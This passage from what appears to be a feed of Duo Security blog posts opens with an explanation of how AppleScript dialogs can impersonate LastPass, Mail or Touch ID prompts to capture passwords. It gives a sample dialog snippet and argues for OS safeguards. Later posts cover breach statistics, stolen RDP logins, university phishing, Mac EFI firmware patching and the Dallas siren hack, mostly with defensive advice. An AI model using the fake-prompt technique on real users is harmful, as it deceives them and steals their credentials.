For example, one might create a script for Apple’s Mail application that gathers email messages from a certain sender by showing a prompt that allows the user to type in the name or email address to search for.

A dialog as shown in Figure 1 can be created with a single line of AppleScript:

Figure 1

The AppleScript snippet that tells Mail to show the dialog looks like this:

tell application "Mail" to activate tell application "Mail" to display dialog "Please enter the email address to search for..." default answer "" with icon 1 with title "Mail"

In order to execute the above snippet, copy and paste it into Script Editor, which ships with macOS and can be found at /Applications/Utilities/Script Editor.app.

Applescript Screenshot

Beyond Apple’s core services, there are many third-party applications that also support scripting via AppleScript. For example, if we wanted to write an AppleScript tool that searches our bookmarks for a URL, (ignoring for a second that Chrome has its own search capabilities), we could start with a dialog prompting the user for a website title or URL to search for, as shown in Figure 2:

Figure 2

AppleScript Goes Bad

As is clear from looking at these simple examples, an unsuspecting victim might assume that these dialogs are part of a trusted application because of the icon and generally having a “normal” macOS look and feel, while in actuality, they were generated by an unrelated script. This is convenient for someone developing scripted workflows, as it allows them to focus on functionality and application logic instead of creating UI elements from scratch. However it wouldn’t be a big stretch of the imagination to apply these “easy button UI” capabilities to something a lot less wholesome:

Session Timeout

Wait a minute. What did we just do? In fact, we did nothing different from the previous examples where we were searching Apple Mail for email or Google Chrome for a website. All we needed to do was to tell the LastPass application to show a dialog with the application’s icon and text and buttons of our choosing. To be clear, none of the output generated by entering text in the password field or by clicking the Cancel or OK buttons would get sent to the LastPass application.

Instead, our script generating the dialog would receive the password in plaintext as well as the name of the button the victim clicked. The attacker could then take further steps to exfiltrate the victim’s LastPass Vault contents without their knowledge.

Other examples would be getting the victim’s macOS account credentials to elevate privileges if the victim has administrator privileges, or starting other processes that run on behalf of the victim and capture data that is then sent to a remote command and control server. Or, as the OSX.Bella malware implements, prompt the victim to enter their Apple ID credentials.

Pro-Level AppleScript Phishing

Successful phishing attacks are all about meeting the implicit expectations of users to avoid raising suspicions of something being amiss. The recent introduction of the new Touchbar MacBook Pro brought a Touch ID sensor to the macOS desktop experience, and with it a change in workflow of how users interact with their system when authenticating.

Extending the ruse of what has been discussed above to the new Touch ID workflow is relatively simple and we can come up with a sequence that looks something like this:

  • First, an alert dialog is displayed by System Preferences, which is a familiar application to the victim.
  • The victim is alerted to the fact that a timeout has occurred and that they must re-authenticate in order to keep using Touch ID.
  • Optionally, this could be made to trigger only when the victim opens an application to make it seem as if the Touch ID re-authentication prompt was triggered by it.
  • The attacker shows a secondary dialog using an available Touch ID icon that is part of macOS in order to complete the look and feel of a legitimate Touch ID prompt.
  • Once the victim enters their credentials, the attacker stores them for further use.
  • The victim will not notice any different Touch ID behavior since it was never in an unauthenticated state to begin with.
  • The deception is complete, credentials were obtained.

A short animated sequence showing this in action can be seen in Figure 3:

Figure 3

The interesting thing to note here is the ease with which a new system workflow can be turned against a user and prey on their expectations and muscle memory. For operations like authentication, which should be considered sensitive or privileged, operations system designers need to think carefully about how their UI and UX communicate the source of their user-facing prompts and develop a clear way for a user to easily and reliably apply a level of trust to the action they are being asked to perform. The lack of a clearly defined and recognizable user credential request method and UI that is gated by the OS and not available to AppleScript could help there, but would take time to gain user trust as the “One True Way” an application can request credentials.


In our opinion, it is entirely too easy for an attacker to borrow (or hijack if you will) any AppleScript-capable application to prompt the victim with a legitimate-looking UI and ask them to enter any amount of sensitive data like passwords, two-factor authentication (2FA) codes, or other information.

Because there is no warning from the OS to let the victim know that another process is attempting to show a dialog via an application it is not part of, it is far too easy to gain a victim’s trust. It would be good security practice if macOS required the user to approve an unapproved AppleScript script in order to interact with an application before actually showing any alerts or dialogs.

For example, the user is shown such prompts in other parts of the OS when an application requires elevated privileges or when it requires Accessibility privileges in order to function. In all those cases, the OS intervenes on behalf of the requesting application by obtaining user authentication or authorization and performs the requested action before allowing the requesting application to proceed. It is time for Apple to apply the same security measures to AppleScript to prevent this type of phishing.

<![CDATA[Stop the Pwnage: 81% of Hacking Incidents Used Stolen or Weak Passwords]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/stop-the-pwnage-81-of-hacking-incidents-used-stolen-or-weak-passwords https://duo.com/blog/stop-the-pwnage-81-of-hacking-incidents-used-stolen-or-weak-passwords Industry News Tue, 02 May 2017 09:45:00 -0400

According to the 10th edition of the Verizon Data Breach Investigations Report, 81 percent of hacking-related breaches leveraged stolen and/or weak passwords. Other trends include a jump in phishing, web application and ransomware attacks.

The Pervasiveness of Phishing

Stolen passwords may be the result of a proliferation of phishing - the attack method was found in over 90% of both security incidents and breaches. The top industries phished include manufacturing, information (Tech), retail and healthcare.

After a successful phishing attempt, 95% of phishing attacks that led to a breach were followed by the installation of software. After opening a malicious attachment, the payload of an exploit kit launches, checking a user’s computer and leveraging vulnerabilities that target Flash or other out-of-date software, browsers or plugins to install malware on their machine. This malware may include keyloggers or other ways to steal data, like usernames, passwords, intellectual property, credit card data, etc.

Web Application Attacks

In attacks against web applications, the use of stolen credentials, phishing, backdoors and command & control (C2) servers accounted for 60% of the incidents (note: findings were heavily influenced by data involved in the Dridex botnet takedown). In these attacks, personal data is now the most frequently compromised type of data, taking the place of credentials from last year.

The report offers up a few security recommendations to help protect web applications, including:

  • Limit the amount of personal information and site credentials stored on web apps or backend databases to the minimum required to run operations, and encrypt the rest
  • Use a second factor of authentication into web applications that would require completely different attack pattern to compromise than passwords
  • Patch your content management systems (CMS) and plugins, and make sure you get notified of out-of-cycle patches

Within the information (tech) industry, when smaller businesses’ user credentials are breached, they typically just reset passwords, since they often don’t have dedicated security staff or processes in place. More proactive security measures include implementing two-factor authentication or patch management of web applications to prevent breaches.

Rise & Commodification of Ransomware

Ransomware has jumped from 22nd place as the most common variety of malware to the fifth most common, according to Verizon. Major industries targeted by ransomware include public administration, healthcare and financial services; although many cases of ransomware targeting hospitals has been publicized widely in the media in 2016.

The commodification of the malware has become known as ransomware-as-a-service, offering the lucrative extortion abilities to anyone that can purchase it. The type of exploit kits used have shifted from Angler to Neutrino to RIG, as the data shows by the end of last year. As a type of crimeware-as-a-service, RIG can be rented for $200 a week, according to research from Recorded Future.

These exploit kits are sent via phishing, accounting for 21% of incidents. Typically, a ransomware phishing email targets employees working in departments that frequently open attachments, such as human resources (HR) or accounting.

According to Heimdal Security, the RIG exploit kit detects eight different vulnerabilities in unpatched software and downloads the Cerber ransomware onto a target system.

While the vulnerabilities used are always changing, as of January, they included:

  • Four critical vulnerabilities affecting Adobe Flash Player (including two that were patched in 2015)
  • Two affecting Microsoft Edge (Microsoft’s latest web browser running on Windows 10)
  • One affecting Internet Explorer versions 9, 10 and 11
  • One affecting Microsoft Silverlight

The ransomware may spread throughout a victim’s system and encrypt their data, locking them out until they pay attackers a ransom to decrypt their files.

Duo’s 2016 Trusted Access Report: Microsoft Edition found that nearly 62% of devices running Internet Explorer had an old version of Flash installed, meaning they may have been susceptible to known vulnerabilities packaged into the RIG exploit kit. And based on research from Cisco’s Talos Intelligence Group on RIG payloads and user agent information, the most commonly exploited victims include users browsing with Internet Explorer on Windows platforms.

Security Hygiene and Patching

Basic security hygiene can help reduce risks associated with known vulnerabilities, like those packaged into exploits sent as attachments in phishing emails. Keep your server software up to date, including operating systems, web applications, browsers and plugins.

For Flash, which is a major target, consider uninstalling it or enabling click-to-play to prevent Flash from automatically launching in web browsers. Many major browsers have this feature on by default, including Chrome, which uses HTML5 by default whenever available. Ad blockers can also help prevent exploitation via malvertising.

Also, with the help of handy access security solutions, you can get insight into your endpoints logging into your applications and detect, block or warn users of out-of-date Flash plugins running on their devices - before they access your environment. When it comes to patch cycle time, most organizations completed patch processes in 12 weeks, with user devices patched most quickly, then servers, and then network devices that aren’t patched until the end of the quarter, according to the report.

Unsurprisingly, the information industry patches most quickly, and comprehensively, fixing 97.5% of vulnerability findings. Manufacturing and healthcare also rank higher on patch time and comprehensiveness. The education industry is slower - on average, they only fix about 18% of vulnerability findings over the 12-week period. The public and finance industries are also slower when it comes to patching.

Learn more about the current state of device security health in Duo’s Trusted Access Report.

<![CDATA[Education, Healthcare & Government Targeted by Stolen RDP Logins]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/education-healthcare-and-government-targeted-by-stolen-rdp-logins https://duo.com/blog/education-healthcare-and-government-targeted-by-stolen-rdp-logins Industry News Mon, 01 May 2017 09:45:00 -0400

Education, healthcare and government are among the most frequently targeted industries, at least when it comes to the amount of stolen remote desktop protocol (RDP) logins up for sale on the dark web, according to an analysis of 85,000 servers from Flashpoint. Other targeted industries include legal and aviation.

Microsoft’s RDP client allows a user to remotely connect to another computer running RDP software over a network connection. It provides a way for system administrators to provide tech support to servers and PCs remotely. While convenient for remote administrators, it’s also a convenient point of entry for malicious hackers that use brute-force, or programmatic password-guessing attacks to get access to RDP servers.

Online criminals use these attacks to find legitimate RDP credentials and put them up for sale on one of the largest dark web marketplaces known as xDedic, effectively selling access to RDP servers connected to systems belonging to educational institutions, healthcare organizations, federal entities, legal firms and many others.

That means malicious hackers can move laterally within the network, create backdoors, install malware, steal data, alter settings and more if they can access RDP servers using just a username and password. Windows systems are often the most frequently targeted platform; unsurprisingly, accounting for 63% of devices, according to our analysis of data in The 2016 Duo Trusted Access Report (stay tuned - our 2017 edition is coming soon). Another 65% of Windows devices are running an old version of the operating system, Windows 7, which means they’re missing out on many security features of the latest version, Windows 10.

Back when I wrote about xDedic last summer, it was defunct - now it appears to have emerged once again on the dark web, accessible via Tor with a new address. In a June 2016 report from Kaspersky Lab, access to over 70,000 servers from 173 different countries was up for sale on xDedic. They also found 453 servers with point-of-sale (POS) software installed, meaning they may have been used for some type of credit and debit card processing by companies in the retail industry.

In an analysis of one hacked server, Kaspersky Lab found that attackers compromised it by brute-forcing the RDP password, then installed malware that connected to a command & control (C&C) server. In an analysis of the victim servers that connected to several of the C&C servers that Kaspersky Lab had sinkholed, they were able to identify government entities and universities as some of the high-profile targets.

How can organizations protect against the risk of stolen and sold RDP credentials? Take inventory of your administrator RDP accounts and remove them if they’re not necessary to reduce your attack surface.

Then implement two-factor authentication to protect access to every RDP account login using secure methods like U2F or Duo Push to mitigate the risk of a remote attacker logging into your RDP servers with a brute-forced password. That way, the attacker would need to physically tap your USB device or approve a push notification on your phone, in addition to using your password to be granted access.

Guide to Securing Remote Access Cover Download our free guide, The Essential Guide to Securing Remote Access: Preventing Data Breaches With Strong Authentication to learn more about:

Ideal for security, compliance and risk management officers, IT administrators and other professionals concerned with information security, this guide is for any organization that needs to secure remote access to their environment.

<![CDATA[Phishing Across the Pond: 70% of U.K. Universities Impacted]]> jwright@duo.com(Jordan Wright) https://duo.com/blog/phishing-across-the-pond-70-percent-of-uk-universities-impacted https://duo.com/blog/phishing-across-the-pond-70-percent-of-uk-universities-impacted Duo Labs Wed, 26 Apr 2017 05:00:00 -0400

Back in November 2016, we filed Freedom of Information (FoI) requests to 70 universities across the U.K. asking questions around each institution’s experiences with phishing. The responses we received indicate that phishing is still a major security challenge – even for top universities.

70% of U.K. universities indicate falling victim to phishing attacks

The FoI Results

Multiple factors make universities a popular target for phishing attacks. They have a large, diverse user base consisting of students, faculty and staff, and they hold the sensitive personal information for these users as well as alumni. In addition, universities are frequently involved in grant funded, innovative research that is valuable to a motivated attacker.

Phishing data from our survey of U.K. universities

The results of our FoI requests show firsthand the exposure universities have to phishing. Seventy percent of the universities who responded to these requests indicated that they have fallen victim to a phishing attack, with 12 of these universities reporting they had been attacked more than ten times in the past year. Seven of the universities that responded, including those with GCHQ Certified degree courses – Oxford University and Cranfield University – reported they had been struck more than 50 times.

“The findings reveal that universities – staff and students – make popular targets for these attacks, which leaves them vulnerable to all kinds of security risks. ... They open the doors to hackers, with stolen credentials, to access an organisation’s system virtually undetected, posing as an authorised user. Worryingly, phishing is now the most popular way of delivering ransomware onto an organisation’s network.”
– Henry Seddon, Duo Security Vice President of EMEA

One thing is clear from our results: Phishing remains an important security issue affecting universities.

Phishing Affects Everyone

Universities aren’t alone. It’s important to remember that, while these results are focused on the education space, phishing affects everyone. The most recent data from our free phishing simulation tool, Duo Insight, shows that on average, 13% of users will fall victim to phishing attacks, with 61% of the campaigns resulting in at least one user attempting to submit credentials to our fake phishing page.

And stolen credentials are only one side of the phishing story. Malware is commonly delivered by exploit kits, which use known vulnerabilities to exploit out-of-date devices. With just the click of a link in a phishing email, these exploit kits can compromise a user's device. In our simulated campaigns, on average 25% of users clicked these links. That’s why it’s important to not only keep your devices up-to-date, but to also have visibility into the devices accessing your critical applications.

How to Protect Yourself and Your Organization from Phishing

The Trouble With Phishing

Phishing protection requires a defense-in-depth strategy. There are multiple mitigating factors you can put in place at each layer of the attack chain to help prevent users from falling victim to a phishing email, including:

  • Leverage 2FA For Critical Applications - Phishing attacks regularly aim to steal credentials from users which are then used by attackers to access applications. Enforcing 2FA ensures that stolen credentials can’t be used by attackers to access your applications.

  • Keep Devices Up-To-Date - As mentioned earlier, credentials are only part of the phishing threat. Knowing which devices are accessing your applications and ensuring these devices are up-to-date is critical to protecting against exploit kits which are used in phishing as well as other attacks such as malvertising.

  • Measure Your Exposure to Phishing - You can’t take action on what you can’t measure. We recommend regularly leveraging our free phishing simulation tool, Duo Insight, to measure your organization’s exposure to phishing. Plus, in our blog we offer recommendations to get more value out of your Duo Insight results and decrease your overall exposure to phishing.

These tips are basic measures you can take to significantly mitigate the effectiveness of phishing attacks. For a more comprehensive view on how these attacks are executed and measures to prevent them, check out our free guide, The Trouble With Phishing.

In this guide, you’ll get:

  • the latest phishing statistics by industry
  • a breakdown of how phishing works
  • the anatomy of a phishing attack

Download the guide today.


Phishing attacks aren’t going away anytime soon. 2016 was a record-breaking year for the number of unique phishing sites seen, and as our results show, these attacks continue to be effective. But by implementing the basic security hygiene measures covered here, you'll make great strides toward mitigating phishing for your organization, giving both security and peace of mind.

<![CDATA[Duo Signs Letter Supporting Vulnerability Disclosure Process for NIST]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/duo-signs-letter-supporting-vulnerability-disclosure-process-for-nist https://duo.com/blog/duo-signs-letter-supporting-vulnerability-disclosure-process-for-nist Press and Events Tue, 18 Apr 2017 09:00:00 -0400

Duo signed a joint letter penned by Rapid7 recommending the addition of a vulnerability disclosure and handling process in the National Institute of Standard and Technology’s (NIST) cybersecurity framework. NIST’s call for public comment on version 1.1 of its Framework for Improving Critical Infrastructure Cybersecurity brought the issue to light.

Several other security companies and organizations, such as Cisco, Symantec, Bugcrowd and many others, including the Center for Democracy & Technology, the Electronic Frontier Foundation (EFF), etc. also signed the letter.

The impetus behind the comments is to clarify the existing elements of the framework and outline processes for receiving, assessing and mitigating security vulnerabilities from outside sources, such as independent researchers.

According to the letter, the benefits of a coordinated vulnerability disclosure and handling process include:

  • Organizations can quickly detect and respond to reported vulnerabilities
  • This can help them increase the security, data privacy and safety of their systems
  • Security researchers or other vulnerability reporters will be protected, and reduce conflict or misunderstanding
  • For organizations with limited cybersecurity resources, they can benefit from external discovery of vulnerabilities of their product, services, infrastructure and system configuration

The letter also points out that best practices for vulnerability disclosure and handling processes already exist through the ISO 29147 and 30111 standards, which can serve as useful roadmaps customized to each organization’s needs. Katie Moussouris, co-editor of ISO 29147 vulnerability disclosure & ISO 30111 vulnerability handling processes, has also signed the letter supporting the proposed revisions.

According to Rapid7, if the Framework includes this revision, they hope it will lead to more companies and government agencies adopting these processes, which will both strengthen security overall and ease communication with security researchers.

Read the full letter and get more detailed information on the explicit changes: Joint Comments on "Framework for Improving Critical Infrastructure Cybersecurity" version 1.1 Before the National Institute of Standards and Technology.

<![CDATA[Don’t Get Sonic Screwed: Update Your S%&#]]> pbruienne@duo.com(Pepijn Bruienne) https://duo.com/blog/dont-get-sonic-screwed-update-your-sand https://duo.com/blog/dont-get-sonic-screwed-update-your-sand Duo Labs Wed, 12 Apr 2017 09:00:00 -0400


  • Security vulnerabilities are just as much of a fact of life in firmware as they are in software
  • Patching firmware vulnerabilities is often less visible than patching software vulnerabilities and may not be something that is monitored in config management systems to the same extent software patching is
  • In the case of Apple hardware, the combination of the model of Apple hardware you run and the version of the OS you run will determine whether firmware vulnerabilities are patched or not
  • Only Apple devices capable of running the macOS 10.12.x branch of the OS have received firmware patches for all of the current publicly known firmware vulnerabilities, this is true even if you are running the latest security patches Apple released for OS X 10.11.x and 10.10.x
  • Understanding your Apple fleets’ software and hardware versions is required if you want to be able to quantify your exposure to firmware vulnerabilities

Recent events surrounding Apple and widely-reported vulnerabilities of its Macintosh products are once more emphasizing the importance of applying macOS security updates as quickly as possible. This is because security updates not only contain patches for the macOS software itself, but they also deliver very important updates to the device’s firmware, commonly referred to as EFI or the Boot ROM.

A Mac’s EFI contains low-level functionality that handles early boot functionality immediately following power-up. It helps to connect external peripherals like a network device or a display and ultimately selects a valid macOS boot device before handing off control to the OS itself. This firmware lives in its own writable ROM environment and can be updated with changes and fixes just like macOS.

And just like any other software, EFI is susceptible to bugs that can be exploited by attackers to gain low-level control of a target Mac. The methods by which EFI vulnerability exploitation is achieved are a little different than exploiting macOS vulnerabilities, but the results can have a bigger impact due to the privileged position the EFI firmware has in the boot chain.

As security fixes for Apple’s firmware are often far less visible to end users and administrators than software-based security fixes they can often go unnoticed, this raised some questions for us as to what the actual attack surface of the Apple ecosystem was in terms of firmware vulnerabilities. This blog post covers some of the background of Apple firmware vulnerabilities and our initial findings from looking into how Apple supplies firmware updates to devices in the field across a range of OS versions.

A Short History of Leaked Apple Vulnerabilities

So why is any of this important? On March 23rd 2017, Wikileaks released additional documents from its Vault 7 collection of CIA content that focused on Apple iOS and macOS devices. While a very interesting event in and of itself, many security experts agreed that since the leaked information was a number of years old, it offered no new vulnerabilities or exploitation concepts against the Apple ecosystem.

One of the most talked about aspects of the leak was the set of capabilities codenamed Sonic Screwdriver, a toolkit that enabled the introduction of modified EFI firmware to a targeted Mac. To be able to place a modified EFI firmware on a target Mac, the agency allegedly used a modified Apple Thunderbolt Ethernet adapter connected to the target system while it performed a boot, which allowed the exploitation of a vulnerability in Apple’s firmware to load a modified version that could include keyloggers, data exfiltration tools and so on.

Of particular note is the timeline the leaked documents establish with regards to other research taking place and being discussed in the security community. Only months after the concept of exploiting the fact that a Mac will blindly load option ROMs (embedded device drivers) from attached Thunderbolt devices at boot was first presented in theory at BlackHat USA in January 2012 by security researcher Loukas K aka Snare, the agency had developed and documented a complete solution that outlines loading modified EFI firmware onto a target Mac. Apple would go on to hire security researcher Snare to become part of its firmware security team in 2016.

The first time a complete chain of exploitation was shown in public was some years later when Trammell Hudson of Two Sigma presented it at the 31st Chaos Computer Club conference hosted in Germany in 2014. At the time, Trammell named the exploit “Thunderstrike” which loads a malicious payload using similar hardware and methods as those described in the CIA documents. This is not to say that any of these events were connected, but it does show that the general concept of gaining low-level system presence with long-term persistence was known for a number of years and only addressed by Apple after the public disclosure by Trammell in 2014, with the release of OS X 10.10.2 on January 27, 2015. Details of a second more powerful version of Thunderstrike named Thunderstrike 2 were published in August 2015 when Trammell Hudson and Xeno Kovah of of LegbaCore presented it at the Black Hat security conference in Las Vegas. This vulnerability was patched by Apple in OS X 10.10.4.

What’s the Vulnerability of the Apple Ecosystem’s Firmware?

What does this actually mean to those of us who use Apple systems everyday? Apple gave an official statement to TechCrunch soon after the Wikileaks disclosure stating: “[...] our preliminary assessment shows the alleged Mac vulnerabilities were previously fixed in all Macs launched after 2013.” While this is good news for the many users who purchased Macs on or after late 2013 and who are running up to date versions of macOS, it still leaves a sizeable portion of users in a potentially vulnerable state. The next question is obviously, how do you know if you are vulnerable? To answer this we need to look at the Apple Mac ecosystem from the perspective of both hardware and software.

From a hardware perspective, if you own a Mac older than the following models, and you are running an OS X version older than 10.10 Yosemite, then you definitely did not receive the firmware update that prevents either the Sonic Screwdriver or Thunderstrike attacks:

  • MacBook Pro Retina (Mid 2012),
  • MacBook Air (Mid 2013 and later),
  • iMac (Late 2013 and later),
  • Mac Pro (Late 2013),
  • Mac mini (Late 2014)

From a purely software perspective, since Apple has never released firmware updates for OS X versions prior to OS X 10.10, this means that if you are running OS X 10.9 or earlier Mac hardware of any age then it is also vulnerable (and will likely never be patched).

In order to gather a quantitative view into how large of a population is still vulnerable to these attacks, we conducted some analysis of Duo’s endpoint authentication logs and found that as of late February 2017, around 10% of unique endpoint check-ins reported OS X versions of 10.9 or older.

These endpoints are all vulnerable to Sonic Screwdriver, Thunderstrike variants and any other undisclosed tools using the same approaches possibly in use by either private or state actors.

Apple Releases Batch of Firmware Security Fixes

Soon after the leak of the CIA documents, Apple released macOS 10.12.4 which as usual contains an extensive list of security fixes, part of which was an updated collection of EFI firmware updates for the largest set of Mac models to date. Noteworthy were EFI firmware updates for Mac models that had not received any updates since 2012 or earlier due to updated Internet Recovery options that are part of the firmware:

  • MacBook Air (11-inch, Late 2010)
  • MacBook Pro (13-inch, Mid 2010)
  • Mac mini (Mid-2010).

Beyond the much discussed new Night Shift feature added in 10.12.4, specific highlights of the EFI firmware updates released by Apple in the 10.12.4 update are:

The first issue allowed an attacker with specialized Thunderbolt-based equipment to retrieve Filevault 2 FDE keys from memory, which could then be used to unlock the target Mac after a reboot and, if automatic login was enabled, to log into the user’s account. It is unclear at this time whether the aforementioned older models that are now included in the EFI updates also received this security update, even though some of them have expansion ports that could technically be vulnerable, such as the MacBook Pro (13-inch, Mid 2010).

The second important change to the firmware that many Mac system administrators have been waiting for Apple to make for some time. What changed? Up until macOS 10.12.3, the Internet Recovery mode used to wipe and reinstall macOS on a target Mac would install the version of the OS the Mac originally shipped with. If a Mac originally shipped with OS X Yosemite and Internet Recovery was invoked at a later time, when a newer version of macOS shipped, the Mac would still receive OS X Yosemite and it was up to the user to manually upgrade to the latest OS version.

This was a cumbersome procedure and likely resulted in users not bothering to upgrade to the latest OS, causing them to miss out on important security updates and putting themselves at risk. As of the macOS 10.12.4 update, Internet Recovery will now actively determine the newest compatible version of macOS and install it. This will go a long way to ensure that Mac users are always running the latest version of macOS in the event a full OS reload is required. It will also help Mac system administrators who use this Apple-recommended method to repurpose corporate-owned Macs for a new user.

Securing All the Macs

Given all of the above, we have the following recommendations to keep your personal and organization’s Mac systems as secure as possible:

  • First, determine if your Mac is one that can be patched against the discussed vulnerabilities.
    • All Mac models going back to mid-2010 have available updates in macOS 10.12.4 so update your OS to the latest macOS 10.12 Sierra
    • If you have legacy applications that don’t support macOS 10.12 Apple released a separate patch for older OS X versions through Security Update 2017-001 for 10.10 Yosemite and 10.11 El Capitan which contain EFI firmware updates, though be aware that they cover a smaller subset of Mac models.
  • Once upgraded, make sure to install all future patches as soon as they become available. All of Apple’s major OS releases have been free as of the past few years, so if your Mac supports it, cost won’t be an issue.
  • If your Mac is not in that list and is too old to support OS X 10.10 or later, then these vulnerabilities are never going to be fixed for your system’s firmware and they will continue to be vulnerable. In these cases, the easiest advice to give you is that this is an excellent time to shop around for a new one.
  • If purchasing a new Mac is not an option, then you should consider the uses and privileges that your vulnerable Macs have and limit them to roles that do not have access to sensitive data. Consider network isolation if these older machines require network access.
  • Additionally, given that many of the attacks targeting firmware vulnerabilities require physical access, you can help to defend against them by not using vulnerable devices outside of a physically secured environment and not allowing them to be taken home or on travel.


The one thing to take away from all of the preceding discussion is this: only the current version of macOS will receive the complete set of Apple security patches. Older versions quickly drop off the radar and will leave Macs in a vulnerable state, both from an OS and application standpoint, as well as from a firmware one.

The only way to be sure a Mac is protected is to only run the current macOS version and to apply patches immediately after they are released. Mac system administrators also want to take extra care that the firmware updates that are part of macOS updates can be properly applied by their organization’s management tools and that they can reliably report EFI firmware versions across their fleet. In case your management software is unable to gather this data, we recommend taking a look at osquery and the built-in platform_info table which contains a version key that accurately reflects the EFI firmware version. By keeping track of what firmware versions are installed on your fleet you can more easily mitigate any drift and keep all endpoints protected.

<![CDATA[The Dallas County Siren Hack]]> mloveless@duosecurity.com(Mark Loveless) https://duo.com/blog/the-dallas-county-siren-hack https://duo.com/blog/the-dallas-county-siren-hack Duo Labs Tue, 11 Apr 2017 09:56:00 -0400

The emergency sirens were activated in Dallas County last Friday night at 11:42pm. This is not an unusual event in Dallas and the surrounding areas, in fact this is kind of a common occurrence during the springtime. That is when we get the most severe storms here in Texas (well, pretty much this entire region of the country). Colloquially known as the “tornado sirens”, they provide an early warning system in the event of a tornado warning being issued by the National Weather Service.

Additionally, they are activated whenever a storm is capable of producing straight-line winds in excess of 70 miles per hour or hail larger than one inch in diameter - basically any conditions that will endanger lives (usually limited to weather conditions). While intended to alert people who are outdoors to encourage them to move inside, they can be heard indoors fairly easily unless you are in the middle of listening to loud music, a VERY sound sleeper, or you live on the very outer edge of the nearest siren’s coverage area.

Dallas County The Emergency Operations Center (EOC), run by the Dallas Office of Emergency Management (OEM). Photo courtesy Dallas OEM.

However, in this case, the sky was clear and there was no storm in sight, in fact, there wasn’t even a storm remotely close to the Dallas area at all. First reported as a malfunction, it was later discovered to be a hack.

Here is what we know so far:

  • A physical location where the computer or computers used to control what the sirens do (the length and duration of a siren sound) was compromised.
  • The system was then activated, probably through the use of Dual-Tone Multi-Frequency (DTMF) signaling via radio.
  • All 156 sirens were activated and went through 15 cycles of 90 seconds and were triggered approximately 60 times before they were shut down.
  • The sirens sounded repeatedly from 11:42pm until 1:17am.
  • The system was down until Monday afternoon at approximately 2:00pm for a total outage of roughly 52 hours.

There are a few things to explore around this, such as what technical details we can surmise about the hack and why someone might do it.

What Happened

One of the first things I did when I heard it was a hack was to search for information on siren systems. The usual setup involves a number of sirens which are triggered/controlled by a series of DTMF tones via radio, typically via UHF 450mHz. Repeaters are used to allow for a central location to send out the commands to the various sirens. This technology dates back decades. Newer systems allow programming of pre-determined siren sounds and their durations, and can be triggered via a central location. Some vendors of these systems allow for complete automation - if a National Weather Service alert comes in that would warrant the sirens going off, the sirens are activated automatically without human intervention.

The Dallas County system is like most systems - it is a hybrid mix of old and new, and most vendors selling the new systems realize that the system they will be administering will be this odd mix. Additionally, due simply to the legacy nature of these systems, most sirens themselves are still air-gapped, so remote activation is usually done via a central system that uses the legacy radio and repeaters from decades ago to perform the DTMF triggering of the sirens.

Per the Dallas Office of Emergency Management (OEM), they could not turn off the system remotely or at Dallas OEM headquarters, and decided to turn off the entire radio system, including the repeaters (at multiple locations), to silence the sirens. Frighteningly, the Dallas city officials and Dallas OEM personnel that have the authority to activate and deactivate the sirens can do so not just from their desktop computer systems at work, but also via an app on their iPhones. Obviously this central control system is not air-gapped.

During a press conference, they stated that they had eliminated any of their “control systems” or “remote logins” as being used in the hack. They traced it down to one area where they believed the hack took place. Apparently it was put into a mode where it repeatedly triggered the sirens. The fix was to simply disconnect everything, and since they typically never take the system down, they had to follow a special series of steps to gracefully shut it down so they can get it back up again later.

So What Really Happened?

This obviously sounds like a central computer was accessed and settings were adjusted to not only make the sirens repeatedly go off, but to prevent Dallas OEM from being able to shut it off.

This implies two things - a computer was accessed most likely via a compromised password (or worse, a default or even no password) and an attacker-supplied password was set to prevent the attacker’s changes from being overwritten.

Dallas OEM also stated that it had not contacted the local police, but had contacted the FCC for help in determining where the hack came from. Since the FCC regulates communications via a number of mediums including radio, and Dallas OEM stated they shut down their radios and repeaters, this suggests that while one system was accessed to set up a mode of repeating siren activations, there was also some type of use of radio during the event as well.

The FCC may be able to interpret such things as logs or other data gathered to help pinpoint where this illicit radio communication came from. For instance, if multiple devices are set up to receive radio transmissions, by examining signal strength, one could triangulate the position of the source of the transmission. Even by doing live experiments with a single receiver, they could potentially get an idea of roughly where, and, if they get lucky, it will be a parking lot that has security cameras aimed at it.

The FCC does more than just radio, and it sounds like they are looking over all associated logs across all related systems, but since Dallas OEM shut down the radio system as well as the central computers, it does imply radio usage. Who Did It?

This is where things get kind of interesting. Since this wasn’t something that could be done just spur of the moment, it suggested some level of planning. Now it could be just a goof hack done as a prank, maybe performed by some clever teen wearing a hoodie and getting their Mr. Robot on. However, a few things about this suggest it might be something else.

The timing was interesting, there was plenty of uneasiness in the US after last week’s response to Syria's chemical attacks. While quite possibly a coincidence, a number of people responded to the sirens by going onto social media and opening speculating that we were under attack by Russia and WW III had started. Already understaffed, Dallas’ E911 call center was flooded with calls, leading to call wait times of up to six minutes during its peak. And while Dallas OEM responded via social media not to call 911, many people on Facebook were convinced that the local government was lying and that something bad was happening. Rumors started of similar sirens in other cities in Texas and Oklahoma (which turned out to be false).

So panic - or at least confusion - set in fairly quickly. Considering it happened at night and the sirens repeatedly went off over and over, it seems that bare minimum it was planned to irritate, but it doesn’t take much of a leap to realize that using a system designed to warn people about danger is going to cause concern if it keeps going off.

The Siren Hacker Did Their Homework

While reading up on Outdoor Warning Siren (OWS) systems, I read that many older models could only run for a limited amount of time before they would overheat and need to recover before being activated again. The attacker apparently knew this as well, as the pattern of the sirens being turned on and back off in cycles would prevent the overheating. I doubt all of the 156 sirens have been upgraded to modern sirens that do not have this same issue, so the attacker compensated as they intended the sirens to not only go off and on repeatedly, but to do so over a long period of time. And because of this, the attacker made adjustments to lock out Dallas OEM from their own system and maximize the length of the event.

So the attacker had some knowledge of how things were put together. Most of this knowledge could be gleaned from Google searches, you can download manuals for a lot of different sirens and systems, and most of the software being sold to control these systems can be downloaded for free (demo versions only) allowing for a crash course in OWS management. But a few things such as the use of radios, knowing exactly what systems were in place, and what radio frequencies might be involved suggest a bit more planning. So I am thinking potentially three scenarios - a disgruntled insider, an attacker wanting to see at scale how a city would react and kind of measure the results, or a clever movie plot device to distract us while George Clooney and Brad Pitt pull off some robbery.

